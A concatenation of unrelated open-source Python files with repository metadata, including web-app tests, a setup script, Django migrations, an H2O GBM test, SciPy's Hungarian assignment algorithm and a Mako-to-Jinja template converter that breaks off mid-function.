smurfix/pybble | test/test_app_run.py | 1 | 1520 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, division, unicode_literals
##
## This is part of Pybble, a WMS (Whatever Management System) based on
## Jinja2/Haml, Werkzeug, Flask, and Optimism.
##
## Pybble is Copyright © 2009-2014 by Matthias Urlichs <[email protected]>,
## it is licensed under the GPLv3. See the file `README.md` for details,
## including optimistic statements by the author.
##
## This paragraph is auto-generated and may self-destruct at any time,
## courtesy of "make update". The original is in ‘utils/_boilerplate.py’.
## Thus, please do not remove the next line, or insert any blank lines.
##BP
import pytest
from pybble.manager.main import RootManager
from pybble.core.models.site import Site
from .base import WebTC
from webunit.webunittest import WebTestCase
from .manager import run
def ap_test():
# set a class attribute on the invoking test context
run("mgr -Dt site add AppTest _test atest")
class AppRunTestCase(WebTC,WebTestCase):
# def setupData(self):
# super(AppRunTestCase,self).setupData()
# self.run_manager("mgr -Dt site new AppTest _test atest")
def test_one(self):
self.once(ap_test)
assert Site.q.get_by(name="AppTest").domain == "atest"
self.assertContent("http://atest/one","Number One")
def test_two(self):
self.once(ap_test)
self.assertContent("http://atest/two","Number Two")
def test_three(self):
self.once(ap_test)
self.assertContent("http://atest/three","Number Three")
| gpl-3.0 | 624,786,411,729,272,300 | 31.934783 | 82 | 0.728053 | false |
kev-ss/SSPT | ephem-3.7.6.0/setup.py | 1 | 2117 | import os
from distutils.core import setup, Extension
from glob import glob
# Read the current version from ephem/__init__.py itself.
path = os.path.join(os.path.dirname(__file__), 'ephem', '__init__.py')
for line in open(path):
if line.startswith('__version__'):
__version__ = eval(line.split(None, 2)[2]) # skip '__version__', '='
# The 'ephem' module is built from every .c file in the libastro
# directory plus ...
libastro_version = '3.7.6'
libastro_files = glob('libastro-%s/*.c' % libastro_version)
libastro_data = glob('extensions/data/*.c')
def read(*filenames):
return open(os.path.join(os.path.dirname(__file__), *filenames)).read()
extensions = [
Extension('ephem._libastro',
['extensions/_libastro.c', 'extensions/dtoa.c']
+ libastro_files + libastro_data,
include_dirs=['libastro-' + libastro_version],
),
]
setup(name = 'ephem',
version = __version__,
description = 'Compute positions of the planets and stars',
long_description = read('README.rst'),
license = 'LGPL',
author = 'Brandon Rhodes',
author_email = '[email protected]',
url = 'http://rhodesmill.org/pyephem/',
classifiers = [
'Development Status :: 6 - Mature',
'Intended Audience :: Science/Research',
'License :: OSI Approved ::'
' GNU Library or Lesser General Public License (LGPL)',
'Topic :: Scientific/Engineering :: Astronomy',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
packages = [ 'ephem', 'ephem.tests' ],
package_data = { 'ephem': ['doc/*.rst',
'tests/jpl/*.txt',
'tests/usno/*.txt',
],},
ext_modules = extensions,
)
| gpl-2.0 | 4,993,327,479,694,074,000 | 35.5 | 76 | 0.564006 | false |
Joergen/zamboni | mkt/abuse/tests/test_resources.py | 1 | 4447 | import json
import urllib
from django.core import mail
from django.core.urlresolvers import reverse
from nose.tools import eq_
from abuse.models import AbuseReport
from mkt.api.tests.test_oauth import RestOAuth
from mkt.api.tests.test_throttle import ThrottleTests
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
from users.models import UserProfile
class BaseTestAbuseResource(ThrottleTests):
"""
Setup for AbuseResource tests that require inheritance from TestCase.
"""
resource_name = None
def setUp(self):
super(BaseTestAbuseResource, self).setUp()
self.list_url = reverse('%s-abuse-list' % (self.resource_name,))
self.headers = {
'REMOTE_ADDR': '48.151.623.42'
}
class AbuseResourceTests(object):
"""
Setup for AbuseResource tests that do not require inheritance from
TestCase.
Separate from BaseTestAbuseResource to ensure that test_* methods of this
abstract base class are not discovered by the runner.
"""
default_data = None
def _call(self, anonymous=False, data=None):
post_data = self.default_data.copy()
if data:
post_data.update(data)
client = self.anon if anonymous else self.client
res = client.post(self.list_url, data=urllib.urlencode(post_data),
content_type='application/x-www-form-urlencoded',
**self.headers)
try:
res_data = json.loads(res.content)
# Pending #855817, some errors will return an empty response body.
except ValueError:
res_data = res.content
return res, res_data
def _test_success(self, res, data):
"""
Tests common when looking to ensure complete successful responses.
"""
eq_(201, res.status_code)
fields = self.default_data.copy()
del fields['sprout']
if 'user' in fields:
eq_(data.pop('user')['display_name'], self.user.display_name)
del fields['user']
if 'app' in fields:
eq_(int(data.pop('app')['id']), self.app.pk)
del fields['app']
for name in fields.keys():
eq_(fields[name], data[name])
newest_report = AbuseReport.objects.order_by('-id')[0]
eq_(newest_report.message, data['text'])
eq_(len(mail.outbox), 1)
assert self.default_data['text'] in mail.outbox[0].body
def test_send(self):
res, data = self._call()
self._test_success(res, data)
assert 'display_name' in data['reporter']
def test_send_anonymous(self):
res, data = self._call(anonymous=True)
self._test_success(res, data)
eq_(data['reporter'], None)
def test_send_potato(self):
tuber_res, tuber_data = self._call(data={'tuber': 'potat-toh'},
anonymous=True)
potato_res, potato_data = self._call(data={'sprout': 'potat-toh'},
anonymous=True)
eq_(tuber_res.status_code, 400)
eq_(potato_res.status_code, 400)
class TestUserAbuseResource(AbuseResourceTests, BaseTestAbuseResource, RestOAuth):
resource_name = 'user'
def setUp(self):
super(TestUserAbuseResource, self).setUp()
self.user = UserProfile.objects.get(pk=2519)
self.default_data = {
'text': '@cvan is very abusive.',
'sprout': 'potato',
'user': self.user.pk
}
def test_invalid_user(self):
res, data = self._call(data={'user': '-1'})
eq_(400, res.status_code)
assert 'Invalid' in data['user'][0]
class TestAppAbuseResource(AbuseResourceTests, BaseTestAbuseResource, RestOAuth):
fixtures = RestOAuth.fixtures + fixture('webapp_337141')
resource_name = 'app'
def setUp(self):
super(TestAppAbuseResource, self).setUp()
self.app = Webapp.objects.get(pk=337141)
self.default_data = {
'text': "@cvan's app is very abusive.",
'sprout': 'potato',
'app': self.app.pk
}
def test_invalid_app(self):
res, data = self._call(data={'app': -1})
eq_(400, res.status_code)
assert 'Invalid' in data['app'][0]
def test_slug_app(self):
res, data = self._call(data={'app': self.app.app_slug})
eq_(201, res.status_code)
| bsd-3-clause | -4,684,766,587,172,379,000 | 30.539007 | 82 | 0.598381 | false |
Mapita/mapita_ci | mapita/mapita_ci/management/commands/syncdb_test.py | 1 | 1989 | from django.conf import settings
from django.core.management.commands import syncdb as django_syncdb
from django.core.management.sql import sql_custom
from django.core.management import call_command
from django.core.management.color import no_style
from django.db import models
from django.db import connections, transaction
#from geojson_rest.sql import *
class Command(django_syncdb.Command):
def handle_noargs(self, **options):
orig_load_initial_data = options.get('load_initial_data')
options['load_initial_data'] = False
super(Command, self).handle_noargs(**options)
db = options.get('database')
connection= connections[db]
# Create customs views for geojson_rest
if 'geojson_rest' in settings.INSTALLED_APPS:
app = models.get_app('geojson_rest')
app_models = models.get_models(app, include_auto_created=True)
tables = connection.introspection.table_names()
converter = connection.introspection.table_name_converter
            custom_sql = sql_custom(models.get_app('geojson_rest'), no_style(), connection)
#self.stdout.write(custom_sql)
if custom_sql:
cursor = connection.cursor()
try:
for sql in custom_sql:
cursor.execute(sql)
except Exception as e:
self.stdout.write(sql)
self.stderr.write("Failed to install custom SQL for geojson_rest: %s\n" % e)
transaction.rollback_unless_managed(using=db)
else:
transaction.commit_unless_managed(using=db)
# Load initial_data fixtures (unless that has been disabled)
if orig_load_initial_data:
            call_command('loaddata', 'initial_data',
                         verbosity=options.get('verbosity'),
                         database=db, skip_validation=True)
ehelms/Opus | opus/lib/prov/deltacloud_old/storage_snapshot.py | 2 | 1554 | ##############################################################################
# Copyright 2010 North Carolina State University #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
##############################################################################
from xml_tools import xml_get_text
class StorageSnapshot(object):
def __init__(self, deltacloud, dom):
self._deltacloud = deltacloud
self.xml = dom.toxml()
self.created = xml_get_text(dom, "created")[0]
self.state = xml_get_text(dom, "state")[0]
#TODO: Storage Volumes
def __repr__(self):
return self.xml
| apache-2.0 | 2,826,304,343,342,828,500 | 52.586207 | 78 | 0.435006 | false |
peter8472/dungeon-run-ls | dungeonrun.py | 1 | 3588 | #! /usr/bin/python
"""Xmlgame: does xmlstuff
jsgame: does js stuff
App: gets clipboard and runs UI
Right now everythign depends on the UI being up and running. This won't always be the case, and isn't necessary.
"""
import Tkinter
import os
import re
from Tkconstants import *
import sys
import json
from xml.dom import minidom
def cb():
u = Tkinter.Tk()
v =u.clipboard_get()
u.destroy()
return v
class badXmlgame():
""" I want to make this inherit from minidom
It's not working yet"""
chars = { "2":"Thorpin", "1":"Featherwell", "3":"Ganelon", "4":"Pippen"}
def __init__(self,parsed_json):
tmp = parsed_json['json']
tmp = tmp['response']
tmp = tmp['properties']
tmp = tmp['value']
self.xml = minidom.parseString(tmp)
def show_size(self):
games = self.xml.getElementsByTagName("game")
for i in games:
charName = self.chars[i.parentNode.getAttribute("charId")]
length = len(i.toxml())
print "%s %d" % (charName, length)
def toxml(self):
return self.xml.toxml()
class Xmlgame():
"""holds the interpreted xml from the json"""
chars = { "2":"Thorpin", "1":"Featherwell", "3":"Ganelon", "4":"Pippen"}
def __init__(self,parsed_json):
tmp = parsed_json['json']
tmp = tmp['response']
tmp = tmp['properties']
tmp = tmp['value']
self.xml = minidom.parseString(tmp)
def getChar(self,name):
"""get a character given the character name.
        Not case sensitive"""
mychars = self.xml.getElementsByTagName("data")
for i in mychars:
charnum = i.getAttribute("charId")
charname = Xmlgame.chars[charnum]
if re.match("(?i)%s" %(charname), name):
return i
raise NameError, "%s is not a valid name" % (name)
def show_size(self):
games = self.xml.getElementsByTagName("game")
for i in games:
charName = self.chars[i.parentNode.getAttribute("charId")]
length = len(i.toxml())
print "%s %d" % (charName, length)
def toxml(self):
return self.xml.toxml()
class App:
def __init__(self, master):
self.master = master # This is not legitimate use of "master"
cbstats = "Get Stats from the clipboard"
frame = Tkinter.Frame(master, relief = RIDGE, borderwidth=2)
frame.pack(fill = BOTH, expand=1)
label = Tkinter.Label(frame, text="hello world")
label.pack(fill=X, expand=1)
button = Tkinter.Button( frame, text="exit", command=u.destroy)
button2 = Tkinter.Button( frame, text="hello", command=self.say_hi)
button.pack(side=BOTTOM)
button2.pack(side=BOTTOM)
button3 = Tkinter.Button( frame, text=cbstats, command=self.blah)
button3.pack(side=RIGHT)
def blah(self):
tmp = self.master.clipboard_get()
print "size is %d" % (len(tmp))
g = json.loads(tmp)
game = Xmlgame(g)
game.show_size()
# print game.toxml()
def say_hi(self):
print "hi there"
def savecb(filename):
stuff = cb()
if os.path.exists(filename):
raise NameError, "file exists"
with open(filename,'w') as f:
f.write(stuff)
def getcb():
stuff = cb()
js = json.loads(stuff)
return Xmlgame(js)
def getfile(fname):
with open(fname) as infile:
js = json.load(infile)
return Xmlgame(js)
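# Typical interactive use (the file name below is hypothetical):
#
#   savecb('dump.json')         # write the clipboard JSON to disk once
#   game = getfile('dump.json')
#   game.show_size()            # per-character payload sizes
#   game.getChar('thorpin')     # <data> node for that character (case-insensitive)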
if __name__ == "__main__":
if len(sys.argv) != 2:
print "usage: %s <filename>"
u = Tkinter.Tk()
app = App(u)
u.mainloop()
exit(1)
with open(sys.argv[1]) as f:
tmp = f.read()
parsed_json = json.loads(tmp)
print "Total length %d" % ( len(tmp))
blah = Xmlgame(parsed_json)
blah.show_size()
| apache-2.0 | 1,777,711,092,362,866,000 | 25.977444 | 113 | 0.625418 | false |
hanteng/pyCountryGroup | pyCountryGroup/data/__init__.py | 1 | 2056 | # -*- coding: utf-8 -*-
#Discrimination is boundless; turn back and reach the shore. Keystrokes rise and fall; feelings real and illusory.
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import pandas as pd
import os
__all__ = ["iso","iso2","ison","wb_cname","un_cname",\
"wb_r_long","un_r_long", "un_r_long_detail", "wb_region", "un_region",\
"wb_i_long","wb_incomelevel","beltroad","beltroad_region","meta","wp"]
__all__ = [str(u) for u in __all__]
_ROOT = os.path.abspath(os.path.dirname(__file__))
from os.path import basename, join, splitext
wp=pd.read_pickle(os.path.join(_ROOT, "cat.pkl"))
iso=wp['Unicode_UN'].index
iso2=wp['Unicode_UN']['countrycode2']
ison=wp['Unicode_UN']['numeric']
wb_cname=wp['worldbank']['countryname']
un_cname=wp['Unicode_UN']['countryname']
wb_r_long=wp['worldbank']['r_long']
un_r_long=wp['Unicode_UN']['r_long'] #UN region just under the world
un_r_long_detail=wp['Unicode_UN']['r_long_d']
cia_r_long=wp['CIA']['r_long']
wb_region=wp['worldbank']['region']
un_region=wp['Unicode_UN']['region']
cia_region=wp['CIA']['region']
wb_i_long=wp['worldbank']['i_long']
wb_incomelevel=wp['worldbank']['incomelevel']
beltroad = wp["BeltRoad"]["inBeltRoad"]
beltroad_region = wp["BeltRoad"]["inBeltRoad_region"]
meta={'iso': "Country Code (ISO 3166-1 alpha-3)",\
'iso2': "Country Code (ISO 3166-1 alpha-2)",\
'ison': "Country Code (ISO 3166-1 numeric-3)",\
'wb_cname': "Country Name (World Bank)",\
'un_cname': "Country Name (Unicode)",\
'wb_r_long': "Geographic Categorization (World Bank)",\
'un_r_long': "Geographic Categorization (Unicode)",\
'wb_region': "Geographic Categorization Code (World Bank)",\
'un_region': "Geographic Categorization Code (UN)",\
'wb_i_long': "Income Level (World Bank)", \
'wb_incomelevel': "Income Level Code (World Bank)", \
'beltroad': "Part of China’s Belt and Road Initiative (HKTDC)", \
'beltroad_region': "Regions of China’s Belt and Road Initiative (HKTDC)", \
}
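# A minimal usage sketch (assuming the package is importable as pyCountryGroup.data;
# the 'TWN' key is only an illustrative ISO alpha-3 code):
#
#   from pyCountryGroup import data
#   data.wb_cname['TWN']      # World Bank country name for that ISO alpha-3 code
#   data.un_region['TWN']     # UN geographic categorization code
#   data.meta['wb_region']    # human-readable description of the wb_region column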
| gpl-3.0 | 4,161,789,342,414,068,000 | 36.962264 | 82 | 0.629225 | false |
malaonline/Server | server/app/migrations/0161_schoolmaster.py | 1 | 1028 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-09-05 08:50
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('app', '0160_policy'),
]
operations = [
migrations.CreateModel(
name='SchoolMaster',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('school', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='app.School')),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
]
| mit | -7,709,143,905,819,381,000 | 33.266667 | 132 | 0.603113 | false |
pchmieli/h2o-3 | h2o-py/tests/testdir_algos/gbm/pyunit_DEPRECATED_offset_gaussianGBM.py | 1 | 1830 | import sys
sys.path.insert(1,"../../../")
import h2o
from tests import pyunit_utils
def offset_gaussian():
# Connect to a pre-existing cluster
insurance = h2o.import_file(pyunit_utils.locate("smalldata/glm_test/insurance.csv"))
insurance["offset"] = insurance["Holders"].log()
gbm = h2o.gbm(x=insurance[0:3], y=insurance["Claims"], distribution="gaussian", ntrees=600, max_depth=1, min_rows=1,
learn_rate=.1, offset_column="offset", training_frame=insurance)
predictions = gbm.predict(insurance)
# Comparison result generated from R's gbm:
# fit2 <- gbm(Claims ~ District + Group + Age+ offset(log(Holders)) , interaction.depth = 1,n.minobsinnode = 1,
# shrinkage = .1,bag.fraction = 1,train.fraction = 1,
# data = Insurance, distribution ="gaussian", n.trees = 600)
# pg = predict(fit2, newdata = Insurance, type = "response", n.trees=600)
# pr = pg - - log(Insurance$Holders)
assert abs(44.33016 - gbm._model_json['output']['init_f']) < 1e-5, "expected init_f to be {0}, but got {1}". \
format(44.33016, gbm._model_json['output']['init_f'])
assert abs(1491.135 - gbm.mse()) < 1e-2, "expected mse to be {0}, but got {1}".format(1491.135, gbm.mse())
assert abs(49.23438 - predictions.mean()) < 1e-2, "expected prediction mean to be {0}, but got {1}". \
format(49.23438, predictions.mean())
assert abs(-45.5720659304 - predictions.min()) < 1e-2, "expected prediction min to be {0}, but got {1}". \
format(-45.5720659304, predictions.min())
assert abs(207.387 - predictions.max()) < 1e-2, "expected prediction max to be {0}, but got {1}". \
format(207.387, predictions.max())
if __name__ == "__main__":
pyunit_utils.standalone_test(offset_gaussian)
else:
offset_gaussian()
| apache-2.0 | -8,684,211,034,897,369,000 | 41.55814 | 120 | 0.631148 | false |
amjames/psi4 | psi4/driver/qcdb/util/scipy_hungarian.py | 1 | 10333 | # [Apr 2018] stolen directly from scipy so I can get an array back
# https://github.com/scipy/scipy/blob/master/scipy/optimize/_hungarian.py
# Hungarian algorithm (Kuhn-Munkres) for solving the linear sum assignment
# problem. Taken from scikit-learn. Based on original code by Brian Clapper,
# adapted to NumPy by Gael Varoquaux.
# Further improvements by Ben Root, Vlad Niculae and Lars Buitinck.
#
# Copyright (c) 2008 Brian M. Clapper <[email protected]>, Gael Varoquaux
# Author: Brian M. Clapper, Gael Varoquaux
# License: 3-clause BSD
import numpy as np
def linear_sum_assignment(cost_matrix, return_cost=False):
"""Solve the linear sum assignment problem.
The linear sum assignment problem is also known as minimum weight matching
in bipartite graphs. A problem instance is described by a matrix C, where
each C[i,j] is the cost of matching vertex i of the first partite set
(a "worker") and vertex j of the second set (a "job"). The goal is to find
a complete assignment of workers to jobs of minimal cost.
Formally, let X be a boolean matrix where :math:`X[i,j] = 1` iff row i is
assigned to column j. Then the optimal assignment has cost
.. math::
\\min \\sum_i \\sum_j C_{i,j} X_{i,j}
s.t. each row is assignment to at most one column, and each column to at
most one row.
This function can also solve a generalization of the classic assignment
problem where the cost matrix is rectangular. If it has more rows than
columns, then not every row needs to be assigned to a column, and vice
versa.
The method used is the Hungarian algorithm, also known as the Munkres or
Kuhn-Munkres algorithm.
Parameters
----------
cost_matrix : array
The cost matrix of the bipartite graph.
return_cost : bool, optional
If True, also return a copy of the cost_matrix reduced to maximal
zeros at the end of the Munkres algorithm.
Returns
-------
row_ind, col_ind : array
An array of row indices and one of corresponding column indices giving
the optimal assignment. The cost of the assignment can be computed
as ``cost_matrix[row_ind, col_ind].sum()``. The row indices will be
sorted; in the case of a square cost matrix they will be equal to
``numpy.arange(cost_matrix.shape[0])``.
(row_ind, col_ind), cost
Only provided if `return_cost` is True.
Notes
-----
.. versionadded:: 0.17.0
Examples
--------
>>> cost = np.array([[4, 1, 3], [2, 0, 5], [3, 2, 2]])
>>> from scipy.optimize import linear_sum_assignment
>>> row_ind, col_ind = linear_sum_assignment(cost)
>>> col_ind
array([1, 0, 2])
>>> cost[row_ind, col_ind].sum()
5
References
----------
1. http://csclab.murraystate.edu/bob.pilgrim/445/munkres.html
2. Harold W. Kuhn. The Hungarian Method for the assignment problem.
*Naval Research Logistics Quarterly*, 2:83-97, 1955.
3. Harold W. Kuhn. Variants of the Hungarian method for assignment
problems. *Naval Research Logistics Quarterly*, 3: 253-258, 1956.
4. Munkres, J. Algorithms for the Assignment and Transportation Problems.
*J. SIAM*, 5(1):32-38, March, 1957.
5. https://en.wikipedia.org/wiki/Hungarian_algorithm
"""
cost_matrix = np.asarray(cost_matrix)
if len(cost_matrix.shape) != 2:
raise ValueError("expected a matrix (2-d array), got a %r array"
% (cost_matrix.shape,))
if not (np.issubdtype(cost_matrix.dtype, np.number) or
cost_matrix.dtype == np.dtype(np.bool)):
raise ValueError("expected a matrix containing numerical entries, got %s"
% (cost_matrix.dtype,))
if np.any(np.isinf(cost_matrix) | np.isnan(cost_matrix)):
raise ValueError("matrix contains invalid numeric entries")
if cost_matrix.dtype == np.dtype(np.bool):
cost_matrix = cost_matrix.astype(np.int)
# The algorithm expects more columns than rows in the cost matrix.
if cost_matrix.shape[1] < cost_matrix.shape[0]:
cost_matrix = cost_matrix.T
transposed = True
else:
transposed = False
state = _Hungary(cost_matrix)
# No need to bother with assignments if one of the dimensions
# of the cost matrix is zero-length.
step = None if 0 in cost_matrix.shape else _step1
while step is not None:
step = step(state)
if transposed:
marked = state.marked.T
else:
marked = state.marked
if return_cost:
return np.where(marked == 1), state.C
else:
return np.where(marked == 1)
class _Hungary(object):
"""State of the Hungarian algorithm.
Parameters
----------
cost_matrix : 2D matrix
The cost matrix. Must have shape[1] >= shape[0].
"""
def __init__(self, cost_matrix):
self.C = cost_matrix.copy()
n, m = self.C.shape
self.row_uncovered = np.ones(n, dtype=bool)
self.col_uncovered = np.ones(m, dtype=bool)
self.Z0_r = 0
self.Z0_c = 0
self.path = np.zeros((n + m, 2), dtype=int)
self.marked = np.zeros((n, m), dtype=int)
def _clear_covers(self):
"""Clear all covered matrix cells"""
self.row_uncovered[:] = True
self.col_uncovered[:] = True
# Individual steps of the algorithm follow, as a state machine: they return
# the next step to be taken (function to be called), if any.
def _step1(state):
"""Steps 1 and 2 in the Wikipedia page."""
# Step 1: For each row of the matrix, find the smallest element and
# subtract it from every element in its row.
state.C -= state.C.min(axis=1)[:, np.newaxis]
# Step 2: Find a zero (Z) in the resulting matrix. If there is no
# starred zero in its row or column, star Z. Repeat for each element
# in the matrix.
for i, j in zip(*np.where(state.C == 0)):
if state.col_uncovered[j] and state.row_uncovered[i]:
state.marked[i, j] = 1
state.col_uncovered[j] = False
state.row_uncovered[i] = False
state._clear_covers()
return _step3
def _step3(state):
"""
Cover each column containing a starred zero. If n columns are covered,
the starred zeros describe a complete set of unique assignments.
In this case, Go to DONE, otherwise, Go to Step 4.
"""
marked = (state.marked == 1)
state.col_uncovered[np.any(marked, axis=0)] = False
if marked.sum() < state.C.shape[0]:
return _step4
def _step4(state):
"""
Find a noncovered zero and prime it. If there is no starred zero
in the row containing this primed zero, Go to Step 5. Otherwise,
cover this row and uncover the column containing the starred
zero. Continue in this manner until there are no uncovered zeros
left. Save the smallest uncovered value and Go to Step 6.
"""
# We convert to int as numpy operations are faster on int
C = (state.C == 0).astype(int)
covered_C = C * state.row_uncovered[:, np.newaxis]
covered_C *= np.asarray(state.col_uncovered, dtype=int)
n = state.C.shape[0]
m = state.C.shape[1]
while True:
# Find an uncovered zero
row, col = np.unravel_index(np.argmax(covered_C), (n, m))
if covered_C[row, col] == 0:
return _step6
else:
state.marked[row, col] = 2
# Find the first starred element in the row
star_col = np.argmax(state.marked[row] == 1)
if state.marked[row, star_col] != 1:
# Could not find one
state.Z0_r = row
state.Z0_c = col
return _step5
else:
col = star_col
state.row_uncovered[row] = False
state.col_uncovered[col] = True
covered_C[:, col] = C[:, col] * (
np.asarray(state.row_uncovered, dtype=int))
covered_C[row] = 0
def _step5(state):
"""
Construct a series of alternating primed and starred zeros as follows.
Let Z0 represent the uncovered primed zero found in Step 4.
Let Z1 denote the starred zero in the column of Z0 (if any).
Let Z2 denote the primed zero in the row of Z1 (there will always be one).
Continue until the series terminates at a primed zero that has no starred
zero in its column. Unstar each starred zero of the series, star each
primed zero of the series, erase all primes and uncover every line in the
matrix. Return to Step 3
"""
count = 0
path = state.path
path[count, 0] = state.Z0_r
path[count, 1] = state.Z0_c
while True:
# Find the first starred element in the col defined by
# the path.
row = np.argmax(state.marked[:, path[count, 1]] == 1)
if state.marked[row, path[count, 1]] != 1:
# Could not find one
break
else:
count += 1
path[count, 0] = row
path[count, 1] = path[count - 1, 1]
# Find the first prime element in the row defined by the
# first path step
col = np.argmax(state.marked[path[count, 0]] == 2)
if state.marked[row, col] != 2:
col = -1
count += 1
path[count, 0] = path[count - 1, 0]
path[count, 1] = col
# Convert paths
for i in range(count + 1):
if state.marked[path[i, 0], path[i, 1]] == 1:
state.marked[path[i, 0], path[i, 1]] = 0
else:
state.marked[path[i, 0], path[i, 1]] = 1
state._clear_covers()
# Erase all prime markings
state.marked[state.marked == 2] = 0
return _step3
def _step6(state):
"""
Add the value found in Step 4 to every element of each covered row,
and subtract it from every element of each uncovered column.
Return to Step 4 without altering any stars, primes, or covered lines.
"""
# the smallest uncovered value in the matrix
if np.any(state.row_uncovered) and np.any(state.col_uncovered):
minval = np.min(state.C[state.row_uncovered], axis=0)
minval = np.min(minval[state.col_uncovered])
state.C[~state.row_uncovered] += minval
state.C[:, state.col_uncovered] -= minval
return _step4
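# Minimal sketch of the ``return_cost`` extension added in this copy (not part of
# upstream SciPy); the cost matrix is the same toy example used in the docstring.
if __name__ == '__main__':
    cost = np.array([[4, 1, 3], [2, 0, 5], [3, 2, 2]])
    (row_ind, col_ind), reduced = linear_sum_assignment(cost, return_cost=True)
    print(row_ind, col_ind)               # optimal assignment indices
    print(cost[row_ind, col_ind].sum())   # total assignment cost (5 here)
    print(reduced)                        # cost matrix after the Munkres reductions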
| lgpl-3.0 | -293,536,159,332,678,000 | 34.146259 | 81 | 0.618988 | false |
xuhdev/nikola | scripts/jinjify.py | 1 | 9689 | #!/usr/bin/env python
"""Script to convert templates from Mako to Jinja2."""
import io
import glob
import sys
import os
import re
import json
import shutil
import tempfile
import colorama
import jinja2
dumb_replacements = [
["{% if any(post.is_mathjax for post in posts) %}", '{% if posts|selectattr("is_mathjax")|list %}'],
["json.dumps(title)", "title|tojson"],
["{{ parent.extra_head() }}", "{{ super() }}"],
["{{ parent.content() }}", "{{ super() }}"],
["prefix='\\", "prefix='"],
["og: http://ogp.me/ns# \\", "og: http://ogp.me/ns#"],
["article: http://ogp.me/ns/article# \\", "article: http://ogp.me/ns/article#"],
["fb: http://ogp.me/ns/fb# \\", "fb: http://ogp.me/ns/fb#"],
['dir="rtl" \\', 'dir="rtl"'],
['sorted(translations)', 'translations|sort'],
]
dumber_replacements = [
['<%! import json %>\n\n', ''],
["<html\n\\", "<html\n"],
["\n'\\\n", "\n'\n"],
["{% endif %}\n\\", "{% endif %}\n"]
]
def jinjify(in_theme, out_theme):
"""Convert in_theme into a jinja version and put it in out_theme"""
in_templates_path = os.path.join(in_theme, "templates")
out_templates_path = os.path.join(out_theme, "templates")
try:
os.makedirs(out_templates_path)
    except OSError:
pass
lookup = jinja2.Environment()
lookup.filters['tojson'] = json.dumps
lookup.loader = jinja2.FileSystemLoader([out_templates_path], encoding='utf-8')
for template in glob.glob(os.path.join(in_templates_path, "*.tmpl")):
out_template = os.path.join(out_templates_path, os.path.basename(template))
with io.open(template, "r", encoding="utf-8") as inf:
data = mako2jinja(inf)
lines = []
for line in data.splitlines():
for repl in dumb_replacements:
line = line.replace(*repl)
lines.append(line)
data = '\n'.join(lines)
for repl in dumber_replacements:
data = data.replace(*repl)
with io.open(out_template, "w+", encoding="utf-8") as outf:
outf.write(data + '\n')
# Syntax check output
source, filename = lookup.loader.get_source(lookup, os.path.basename(template))[:2]
try:
lookup.parse(source)
except Exception as e:
error("Syntax error in {0}:{1}".format(out_template, e.lineno))
parent = os.path.basename(in_theme.rstrip('/'))
child = os.path.basename(out_theme.rstrip('/'))
mappings = {
'base-jinja': 'base',
'bootstrap3-jinja': 'base-jinja',
}
if child in mappings:
parent = mappings[child]
# Copy assets in bootstrap/bootstrap3
if child == 'bootstrap3-jinja':
assets_dir = os.path.join(out_theme, "assets")
if os.path.exists(assets_dir):
shutil.rmtree(assets_dir)
shutil.copytree(
os.path.join(in_theme, "assets"), os.path.join(out_theme, "assets"),
symlinks=True)
# Copy bundles
# shutil.copy(os.path.join(in_theme, "bundles"), os.path.join(out_theme, "bundles"))
# Copy README
if os.path.isfile(os.path.join(in_theme, "README.md")):
shutil.copy(os.path.join(in_theme, "README.md"), os.path.join(out_theme, "README.md"))
def error(msg):
print(colorama.Fore.RED + "ERROR:" + msg + colorama.Fore.RESET)
def mako2jinja(input_file):
output = ''
# TODO: OMG, this code is so horrible. Look at it; just look at it:
macro_start = re.compile(r'(.*)<%\s*def name="([^"]*?)"\s*>(.*)', re.IGNORECASE)
macro_end = re.compile(r'(.*)</%def>(.*)', re.IGNORECASE)
if_start = re.compile(r'(.*)% *if (.*):(.*)', re.IGNORECASE)
if_else = re.compile(r'(.*)% *else.*:(.*)', re.IGNORECASE)
if_elif = re.compile(r'(.*)% *elif (.*):(.*)', re.IGNORECASE)
if_end = re.compile(r'(.*)% *endif(.*)', re.IGNORECASE)
for_start = re.compile(r'(.*)% *for (.*):(.*)', re.IGNORECASE)
for_end = re.compile(r'(.*)% *endfor(.*)', re.IGNORECASE)
namespace = re.compile(r'(.*)<% *namespace name="(.*?)".* file="(.*?)".*/>(.*)', re.IGNORECASE)
inherit = re.compile(r'(.*)<% *inherit file="(.*?)".*/>(.*)', re.IGNORECASE)
block_single_line = re.compile(r'(.*)<% *block.*name="(.*?)".*>(.*)</% *block>(.*)', re.IGNORECASE)
block_start = re.compile(r'(.*)<% *block.*name="(.*?)".*>(.*)', re.IGNORECASE)
block_end = re.compile(r'(.*)</%block>(.*)', re.IGNORECASE)
val = re.compile(r'\$\{(.*?)\}', re.IGNORECASE)
func_len = re.compile(r'len\((.*?)\)', re.IGNORECASE)
filter_h = re.compile(r'\|h', re.IGNORECASE)
filter_striphtml = re.compile(r'\|striphtml', re.IGNORECASE)
filter_u = re.compile(r'\|u', re.IGNORECASE)
comment_single_line = re.compile(r'^.*##(.*?)$', re.IGNORECASE)
for line in input_file:
# Process line for repeated inline replacements
m_val = val.search(line)
m_func_len = func_len.search(line)
m_filter_h = filter_h.search(line)
m_filter_striphtml = filter_striphtml.search(line)
